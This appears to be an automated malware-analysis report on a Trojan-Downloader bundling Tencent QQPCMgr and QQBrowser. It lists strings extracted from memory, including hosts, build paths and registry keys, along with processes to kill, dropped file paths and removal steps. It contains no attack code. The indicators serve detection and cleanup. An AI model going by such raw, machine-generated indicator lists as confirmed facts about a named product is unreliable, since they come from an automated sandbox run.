Stop Srv %s
CBackSrvCubeSwitch:: app:%s, key:%s, value:%d, valueStr:%s
CBackSrvCubeSwitch:: value empty, %s
CBackSrvCubeSwitch:: key name empty, %s
CBackSrvCubeSwitch:: find = failed, %s
CBackSrvCubeSwitch:: app name empty, %s
CBackSrvCubeSwitch:: find _ failed, %s
switch value %s
\CubeSwitch.etf
e\ProcessManager.dll
CSubFuncItemWinKeyForbidden::InitForbiddenStickKey: get stick setting params failed!
CSubFuncItemWinKeyForbidden::SetForbiddenWinKey: unforbidden win key!
CSubFuncItemWinKeyForbidden::SetForbiddenWinKey: forbidden win key result:%d
CSubFuncItemWinKeyForbidden::InitForbiddenWinKey: Get unforbidden win key func addr failed!
CSubFuncItemWinKeyForbidden::InitForbiddenWinKey: Get forbidden win key func addr failed!
CSubFuncItemWinKeyForbidden::InitForbiddenWinKey: LoadLibrary failed!
QMForbiddenWinKey.dll
CSubFuncItemWinKeyForbidden::InitForbiddenWinKey: GetInstallPath Failed!
CSubFuncItemWinKeyForbidden::InitWorkThread: begin work thread failed!
CSubFuncItemWinKeyForbidden::InitWorkThread: Create quit event failed!
CSubFuncItemWinKeyForbidden::InitWorkThread: Create work event failed!
D"%s" %s
pbUseNewMethod = %d
MemDefragWhiteList.etf
/from=40 /parent=0x%x /left=0 /right=608 /top=0 /bottom=344
%s\NetRepair.exe
block process[%s] recvlimit[%I64u] sendlimit[%I64u] bCutof[%ld]
limit process[%s] recvlimit[%I64u] sendlimit[%I64u] blockRecv[%ld]
platformres:system_logo.png
platformxtml:SpeedupNetMon.xml|FluxItemView
set edit item [%x]
:</text> <text config="ConfigNetflowInfoBold"> %s</text> <text config="ConfigNetflowInfo">,
: </text> <text config="ConfigNetflowInfoBold">%s</text>
MessageSupporter
Bset edit item NULL object[%x]
ID_ColumnOperation
platformxtml:SpeedupNetMon.xml|MainWnd
platformxtml:SpeedupNetMon.xml|VideoWnd
</text> <text config="FontConfig_16_00ad41"> %s </text> <text config="FontConfig_16_333333">
ptchClsName = %s, hWnd = %d
DCClientNetworkInfoQuery SendAsyncQuery(), SendWithOpt, return=%d
CClientNetworkInfoQuery SendAsyncQuery(), SendWithOpt, size=%d
OnNetworkResponse, ip=%d,province=%s,city=%s,isp=%s
Content-Type: multipart/form-data; boundary=%s
CNetSpeedTester::IsNetConnected, clinic net check time=%d
GetProcAddress(IsNetworkOK) Failed,error=%d
GetModuleFileName Failed,error=%d
LoadLibrary Failed,error=%d
QMClinicCore.dll
[NETTEST] InternetReadFile failed: %d=Tid:%d
Finished:Down:Tid:%d, downloadsize=%d
Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Start Down Data : TID=%d
Ddlied6.qq.com
/invc/qqdoctor/other/test32mb.dat
DownloadThread parameter error, threadid=%d
gethostname failed,return=%d
[NETTEST] InternetWriteFile failed: %d,Tid:%d ErrorId:%d
[NETTEST] Error on InternetWriteFile sSendHeadData 0x%x
Error on HttpSendRequestEx 0x%x
[%d] AddRequestHeaders : %d 0x%x
[%d] _SendReqData : dwPostSize %d
Finished:Down:Tid:%d, uploadsize=%d
[NETTEST] Status Code:%d
[%d]HttpQueryInfo : 0x%x 0x%x
[%d]HttpOpenRequest : 0x%x 0x%x
[%d]InternetConnect : 0x%x 0x%x
[%d]InternetSetOption : 0x%x 0x%x
Thread ID : %d , index : %d
netsp.master.qq.com
UploadThread parameter error, threadid=%d
SpeedupRocket.dll
%s=%%[%s]%%
perfLogConf.ini
Global\{A4F31C01-A8C8-40ba-BC77-7E8BF6049F58}
Global\{388F581B-10BF-4918-8A80-565FDC0D6D2D}
QMIpc.dll
Kernel32.dll
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_CLASSES_ROOT
HKEY_USERS
HKEY_CURRENT_CONFIG
%ld%s
sGame Filter :%s
tparse is %s
Filter is %s %ld
gGameFilter.etf
{EB0D612F-45F1-4ab6-88F6-6A3C51AFBD48}_WM_APC
%d.%d.%d.%d
Global\{17ED6DA0-0902-461c-B763-F00FF209066B}
Global\{FA6FBBB1-8C8E-43b1-B8EC-35573A94C231}
ErrLogFile.log
C:\ErrLogFile.log
QMNetworkMgr.dll
mQQQuickLoginInfo
QQLoginInfo
ntdll.dll
Failed to call RtlGetVersion(), err=%d, RtlGetVersion=%p
Windows version: %d.%d.%d (sp %d)
okernel32.dll
dr.dll
%u.%u.%u.%u
11.5.17490.219
@D823ABCA-A92F-429d-9E11-3779B5F682AA
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\Basic\HummerInclude\GF\Include\UtilGF.h
commonres:MessageBox\sysmessagebox_inforFile.png
d:\jenkins_trunk\workspace\11.5patch_sourcejob\qqpcmgr_proj\basic\hummerinclude\common\include\ComSinkPtr.h
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\Basic\HummerInclude\GF\Include\IGFElement.h
Addr-0x%x
*.COMSINK-
d:\jenkins_trunk\workspace\11.5patch_sourcejob\qqpcmgr_proj\basic\hummerinclude\common\include\ITimer.h
d:\jenkins_trunk\workspace\11.5patch_sourcejob\qqpcmgr_proj\basic\hummerinclude\GF/Include/IGFEvent.h
d:\jenkins_trunk\workspace\11.5patch_sourcejob\qqpcmgr_proj\basic\hummerinclude\GF/Include/IGFMessage.h
.Begin
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\Basic\HummerInclude\Common/Include/UtilCore.h
qqpcsysoptimize.exe
riched20.dll
riched20.dll.bk
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\Basic\HummerInclude\GFBase.cpp
qqpctray.exe
\StringFileInfo\xx\FileDescription
\StringFileInfo\xx\FileVersion
\StringFileInfo\xx\ProductName
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\Basic\HummerInclude\GF\Include\UtilMsgEvt.h
msgbox_btn1
msgbox_btn2
msgbox_btn3
commonres:MessageBox\sysmessagebox_warningFile.png
commonres:MessageBox\sysmessagebox_questionFile.png
commonres:MessageBox\sysmessagebox_errorFile.png
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\Basic\HummerInclude\TXMessageBoxEx.cpp
d:\jenkins_trunk\workspace\11.5patch_sourcejob\qqpcmgr_proj\basic\hummerinclude\gf\include\IGFEvent.h
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\Basic\HummerInclude\initplatform.cpp
windows
QMCommon.dll
Load QMCommon.dll failed, path=%S
QQPCMgr.exe
QQPCTray.exe
QQPCRTP.exe

QQPCRealTimeSpeedup.exe_4488_rwx_00170000_00002000:




{E1070104-F404-44CE-B556-0622F9D63EE5}
masterconn11.qq.com
rogram Files\Tencent\QQPCMgr\11.5.17499.219\QQPCRealTimeSpeedup.exe
EGISTRY\USER\S-1-5-21-1844237615-1960408961-1801674531-1003_Classes\Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}
Allows programs to execute as a user that does not have Administrator or Power User access rights, but can still access resouces accessible by normal users.
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files
%WinDir%\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989\
NDOWS;%WinDir%\System32\Wbem;c:\Program Files\Wireshark






Remove it with Ad-Aware




    

  1. Click (here) to download and install Ad-Aware Free Antivirus.
    2. 

  2. Update the definition files.
    3. 

  3. Run a full scan of your computer.
    4. 





Manual removal*




    

  1. Scan a system with an anti-rootkit tool.
    2. 

  2. Terminate malicious process(es) (How to End a Process With the Task Manager):
    

    QQPCMgr_Setup.exe:2796
    QQBrowserLiveup.exe:1808
    InstAsm.exe:3332
    minidownload.exe:1832
    MiniTPFw.exe:500
    ThunderFW.exe:568
    %original file name%.exe:856
    QQBrowser.exe:1268
    QQBrowser.exe:2328
    QQBrowser.exe:2612
    QQBrowser.exe:3756
    QQBrowser.exe:3532
    QQBrowser.exe:2196
    QQBrowser.exe:3736
    QQBrowser.exe:2944
    QQBrowser.exe:3652
    QQBrowser.exe:3128
    QQBrowser.exe:1968
    QQBrowser.exe:3472
    QQBrowser.exe:3028
    QQBrowser.exe:2888
    QQBrowser.exe:1960
    QQBrowser.exe:2364
    QQBrowser.exe:2852
    QQBrowser.exe:2764
    QQBrowser.exe:3404
    QQBrowser.exe:2836
    QQBrowser.exe:2488
    QQBrowser.exe:2492
    QQBrowser.exe:3032
    QQPCDownload8889533.exe:1584
    j3lx7ew39.exe:2960
    WiFi-2175.exe:664
    BrowserProtect18.exe:2432
    QQBrowserOTA.exe:2012
    ExternalApp.exe:1112
    QBDownload.exe:2504
    regsvr32.exe:2300
    regsvr32.exe:808
    regsvr32.exe:3168
    TsService.exe:3568
    TsService.exe:3448
    cacls.exe:3344
    SuiteDownloader20160222153349.exe:1488
    UpdateService.exe:628
    UpdateService.exe:1880
    

    3. 

  3. Delete the original Trojan-Downloader file.
    4. 

  4. Delete or disinfect the following files created/modified by the Trojan-Downloader:
    

    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TsNetHlp.sys (571 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMAVProxy.dll (1349 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMGuide.dat (704 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\SysHomePage\HomePageRecommendItems.xml (652 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMContextUninstall64.dll (1502 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_391.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr\ProcessLogDll.dll (1818 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMGuide.rdb (261 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\StartupMgr\StartupMgr.dll (9881 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAOKernelControl.dll (1750 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\PhoneMgrConfig.etf (322 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QQPCClinicNetRepair\QQPCClinicNetRepair.png (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QQPCWifiSafe\GF.dll (22160 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\malware.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\AddMore.png (172 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMProviderUpdate.EXE (1876 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TavSignExcl.dat (22 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\7z.dll (8541 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMSCEntrancePlugin\QMSCEntrancePlugin.tpc (661 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMPToolTrayPlugin\QMPToolTrayPlugin.dll (2372 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1005.dat (7 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMArpMgr\jgIOStub.dll (1674 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTencentNews.exe (4448 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQBrowserWebInstaller.exe (4308 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_1.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\smanalyplugin\SMAnalyPlugin.tpc (707 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\config\SupportDomain.xml (283 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMIESafeDll64.dll (1776 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\Microsoft.VC80.CRT\msvcm80.dll (5237 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\sysmalwarejmp\malware.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMBJTrayPlugin\QMBJTrayPlugin.rdb (81 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TVL00003.tvl (9 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\HWPlugin.png (565 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1094.dat (443 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMon\sqlite.dll (6864 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAO\BNSConfig.etf (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\GameSpeedupAppPlugins\QMHardwareDetectPlugin\Config\cpumark.etf (32 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMCheckNetwork.exe (1349 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUdisk.sys (981 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\arkGraphic.dll (4595 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMWebFWCtrl\QMWebFWCtrl.tpc (669 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMClinicTrayPlugin\QMClinicTrayPlugin.rdb (163 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1107.dat (456 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetSpeedTest\NetSpeedTest.png (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAVInterface.dll (2643 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetflowOpti\QMNetflowOptiDll.dll (1033 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMDnsMonitor\QMDnsMonitor.dll (3065 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\GFFtsysCustom.dll (2208 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\xGraphic32.dll (2232 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\config\DNSHookDomainList2.0.xml (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\GameSpeedupAppPlugins\QMGameAcceleratePlugin\QMGameAcceleratePlugin.dll (2414 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\macband.txt (35 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMLspPing.exe (591 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMGameAssistant\QMLOLAssistant\QMLOLAssistantShell.dll (8276 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\WebFireWallForRtp.dat (998 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMDLP.exe (5997 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\IEStartPage\IEStartPage(big).png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\adfilterlib\tsadlibforce.xml (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCfixUI.dll (1916 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_1026.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\GameUpgrade.dll (6063 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMRouterLogic.dll (6649 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QMNetMobileFlux.png (989 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMHipsNotifyReport.dat (744 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMEtw.exe (1379 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMStateCheck.exe (1103 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1701.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\NMLib.dat (101 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1084.dat (453 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\FileSmash.png (314 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1098.dat (454 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMArpMgr\xGraphic32.dll (431 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_134.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_1909.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCSoftTrayTips.dat (720 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMon\NetMon.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\adfilterlib\tsadlibcssac.xml (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1201.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\sysstartupmgrjmp\SysStartupMgrJmp.dll (553 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr\tinyxml.dll (1019 bytes)
    %Documents and Settings%\All Users\Application Data\Tencent\TSVulFw_Cache\TSVulFW.DAT (3786 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\qmudiskmgr\QMUDiskMgr.tpc (665 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QQPCClinicNet\QQPCClinicNet.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\SysCleanPage\syscleanpage.tpc (798 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCXPNOTIFY.dat (712 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TxArp.sys (34 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\QQPCMgrUpdate.exe (5466 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\config\ProblemInfo.xml (199 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMMalCore.dll (7389 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftVerInfo.etf (34 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\sysstartupmgrjmp\StartupMgr.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\qmavtrayplugin\QMShield128.png (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\Microsoft.VC80.CRT\msvcr80.dll (6481 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr\PCSoftMgrToolsDll.dll (1944 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QQPCWifiSafe\zlib.dll (356 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\AppLaunch.48.prf (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_1346.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_889.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMTrojanPlugin\QMTrojanPlugin.tpc (690 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMArpMgr\zlib.dll (784 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\FileSmash\tinyxml.dll (1903 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\AntiRK.sys (362 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\CheckAv.etf (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMGameAppPluginInfo.xml (969 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMSysRepLib.dat (6413 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\PackageUpdate.dat (3821 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\StartupMgr\startupmgr.tpc (879 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1411.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCFileOpen.exe (6787 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMTrayDetector\QMTrayDetector.dll (1760 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCClinic.dat (720 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_298.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMClinicsettingcenter\QMClinicSettingCenter.rdb (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\tinyxml.dll (1295 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\MemDefrag.dll (838 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCXPNOTIFY.exe (4877 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMHungDll.dll (4805 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QmTtInterface.dll (4071 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMSkinMgr.dll (5097 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMLoader\QQPCDetector.dll (7694 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftAnalyzePolicy.etf (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1022.dat (6 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\qmsoftplugin\QMSoftPlugin.dll (3423 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMForbiddenWinKey.dll (386 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\SysSpeedUp\SysSpeedUp.dll (2775 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QQPCWifiSafe\jgIOStub.dll (14 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\tpk\1.0.0.1\def\virscr00.def (21 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QQPCWifiSafe\libpng.dll (2859 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\DownloaderMgrScript.dat (4 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\MalWare.dll (4492 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\qmavtrayplugin\sm10.dat (10 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr.dll (6358 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMAutoTaskPlugin\QMAutoTaskPlugin.tpc (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1224.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\wifigx.png (800 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCSoftConfig.dat (720 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\setup.xml (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMArpHelperDll.dll (1777 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_1879.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_1083.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TxArp5.inf (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\GameSpeedupAppPlugins\QMHardwareDetectPlugin\Config\GameLogo\defaultlogo.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\FileSmash\QQPCCommonMgr.rdb (13284 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\SuperSpeedup.rdb (152 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1009.dat (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\DownloaderManager.dll (8518 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QQPCB1AndroidJmp.png (1 bytes)
    %Documents and Settings%\All Users\Application Data\Tencent\QQPCMgr\Quarantine_Cache\QMQuarantine.exe (3878 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_715.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMClinicTrayPlugin\QMClinicTrayPlugin.dll (7183 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMGameAssistant\QMLOLAssistant\QMLOLAssistantCore.dll (3828 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMPerfCtrl\QMPerfCtrl.dll (4167 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\PackageConf.dll (3287 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_120.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAO\MFConfig.etf (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMRealTimeSpeedupSkinCenter.zip (111 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TSDefenseBt.sys (14 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\GameSpeedupExposure\GameExposureCfg.xml (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\GameFilter.etf (9 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\qqpcupgradejump.png (503 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\GameSpeedupAppPlugins\QMHardwareDetectPlugin\QMHardwareDetectPlugin.tpc (716 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\pic\Check_Router.png (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\Microsoft.VC80.CRT\8.0.50727.4053.cat (7 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_2015.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMVulPlugin\QMVulPlugin.tpc (671 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMHwFloatWnd\QMHwFloatWnd.dll (3200 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QuickOpenLogo\QQPCSoftMgr_QO.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\libpng.dll (598 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\HPScannerPlugin\hptrojanscan\HPTrojanScan.dll (5077 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1407.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\QQPCUpdate.exe (3361 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMRecommenderRes.dat (96 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\HPScannerPlugin\hpiestartpagescan\HPIEStartPageScan.dll (2092 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\jgImage.dll (90 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\FileMon\i386\TFsFlt.sys (2964 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TxArp6_64.sys (964 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QOLogo\DefaultMgr.png (5 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\npQMExtensionsIE.dll (1455 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCStub.exe (1261 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\SuperKillModules.dll (1331 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMEmMat.dll (1755 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMGuide.exe (2626 bytes)
